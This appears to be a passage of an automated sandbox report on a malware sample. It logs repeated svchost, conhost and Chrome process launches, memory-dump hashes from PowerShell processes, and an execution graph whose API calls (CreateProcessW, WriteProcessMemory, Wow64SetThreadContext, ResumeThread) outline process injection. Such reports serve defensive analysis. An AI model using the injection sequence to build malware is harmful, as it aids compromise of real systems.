                                                                                Target ID:57
                                                                                Start time:05:34:54
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:58
                                                                                Start time:05:34:57
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:59
                                                                                Start time:05:34:58
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,3916554340437548015,1500443498568681016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:60
                                                                                Start time:05:35:01
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:61
                                                                                Start time:05:35:02
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2016,i,9777007145685273446,11700763769562909530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:62
                                                                                Start time:05:35:02
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:63
                                                                                Start time:05:35:02
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:64
                                                                                Start time:05:35:07
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:65
                                                                                Start time:05:35:07
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,9602569947055018222,14101658706447688223,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:66
                                                                                Start time:05:35:11
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:67
                                                                                Start time:05:35:12
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1492,i,7162340336741099282,8203552688004924699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:68
                                                                                Start time:05:35:12
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:69
                                                                                Start time:05:35:12
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:70
                                                                                Start time:05:35:15
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:71
                                                                                Start time:05:35:16
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2012,i,3848042767598446159,15832118433102009625,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:72
                                                                                Start time:05:35:22
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:73
                                                                                Start time:05:35:22
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2028,i,15924250175209133703,8349155567450697044,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:74
                                                                                Start time:05:35:22
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:75
                                                                                Start time:05:35:22
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:76
                                                                                Start time:05:35:26
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:77
                                                                                Start time:05:35:26
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=1980,i,7225582587041739135,14714490613506234970,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:78
                                                                                Start time:05:35:29
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:79
                                                                                Start time:05:35:30
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,8574600569835257597,12503451850514221727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:80
                                                                                Start time:05:35:30
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:81
                                                                                Start time:05:35:30
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:82
                                                                                Start time:05:35:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:83
                                                                                Start time:05:35:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1648 --field-trial-handle=1996,i,18342384901192943427,3001916881733487027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:84
                                                                                Start time:05:35:38
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:85
                                                                                Start time:05:35:39
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2008,i,13349874762832594225,9819071068630656309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:86
                                                                                Start time:05:35:40
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:87
                                                                                Start time:05:35:40
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:88
                                                                                Start time:05:35:42
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:89
                                                                                Start time:05:35:43
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1984,i,11069439797262297707,896590743492590315,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2176823428.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4dd2d48f0c05759600e1fca0e1a05dbed880511f6dc9a87311e0e685473f4697
                                                                                  • Instruction ID: 449b24f130bebe2a16123c762877e58362cf802d621ba487d312db1274c01865
                                                                                  • Opcode Fuzzy Hash: 4dd2d48f0c05759600e1fca0e1a05dbed880511f6dc9a87311e0e685473f4697
                                                                                  • Instruction Fuzzy Hash: 07E13331E0FB8A5FEB96AB2998156B97BA1EF16390F1800FAD04DC71D3DB189C09C355
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2176823428.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 703cd24aaa24e1f746f479ed6b48af10b6fec1ed65e4fa218e1862fd171b4c5d
                                                                                  • Instruction ID: b3622831e2be8c5d86b256f6c524cd468d1c7e6396ee2d969cab484182cf735a
                                                                                  • Opcode Fuzzy Hash: 703cd24aaa24e1f746f479ed6b48af10b6fec1ed65e4fa218e1862fd171b4c5d
                                                                                  • Instruction Fuzzy Hash: E491E121E0FBC64FEB96AB2848646757FE1EF16690F2900FAC049CB1D3DA1C9C49C356
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2176674649.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction ID: 37fc9caa34a5c56b615ad4bcd41c99b15845001a258ecc5933f33d14631ad2dd
                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction Fuzzy Hash: 7D01677111CB0C4FD744EF4CE451AA5B7E0FB95364F10056DE58AC3651D736E882CB45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2505727168.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ff848ce0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                  • Instruction ID: 55542712fca55ba54de952b9380edddcb8beb0294b5c14c79122f40227c60d2c
                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                  • Instruction Fuzzy Hash: 1301447111CB094FD744EF0CE451AA6B7E0FB99364F10056DE58AC3651D726E882CB45

                                                                                  Execution Graph

                                                                                  Execution Coverage:4%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:33
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph 4999 7ff848cdbdd5 5000 7ff848cdbde3 Wow64SetThreadContext 4999->5000 5002 7ff848cdbeb3 5000->5002 5003 7ff848cdc205 5004 7ff848cdc213 ResumeThread 5003->5004 5006 7ff848cdc2ab 5004->5006 5007 7ff848cdc0e4 5008 7ff848cdc0ed WriteProcessMemory 5007->5008 5010 7ff848cdc1d1 5008->5010 5034 7ff848cdb8a6 5037 7ff848cdba36 5034->5037 5036 7ff848cdb8b6 5038 7ff848cdba3e CreateProcessW 5037->5038 5041 7ff848cdbcd3 5038->5041 5040 7ff848cdbd2e 5040->5036 5041->5040 5042 7ff848cdbd66 Wow64SetThreadContext 5041->5042 5042->5040 5011 7ff848cdbad8 5012 7ff848cdbadf CreateProcessW 5011->5012 5015 7ff848cdbcd3 5012->5015 5014 7ff848cdbd2e 5015->5014 5017 7ff848cdbd66 5015->5017 5018 7ff848cdbda1 5017->5018 5019 7ff848cdbd8c 5017->5019 5018->5014 5019->5018 5020 7ff848cdbe7f Wow64SetThreadContext 5019->5020 5021 7ff848cdbeb3 5020->5021 5021->5014 5022 7ff848cdb76b 5025 7ff848cdb8f2 5022->5025 5028 7ff848cdba7f 5025->5028 5027 7ff848cdb8ce 5029 7ff848cdbaa7 CreateProcessW 5028->5029 5032 7ff848cdbcd3 5029->5032 5031 7ff848cdbd2e 5031->5027 5032->5031 5033 7ff848cdbd66 Wow64SetThreadContext 5032->5033 5033->5031

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: H
                                                                                  • API String ID: 0-2852464175
                                                                                  • Opcode ID: 6afaf372770f170746bf0d2adc91d3fc90ef7d13287a76e21c3bc03f099f56a0
                                                                                  • Instruction ID: 3eaafe38b4d2fe77e87ec62145be2707475907b5627a01d0b754715efc918146
                                                                                  • Opcode Fuzzy Hash: 6afaf372770f170746bf0d2adc91d3fc90ef7d13287a76e21c3bc03f099f56a0
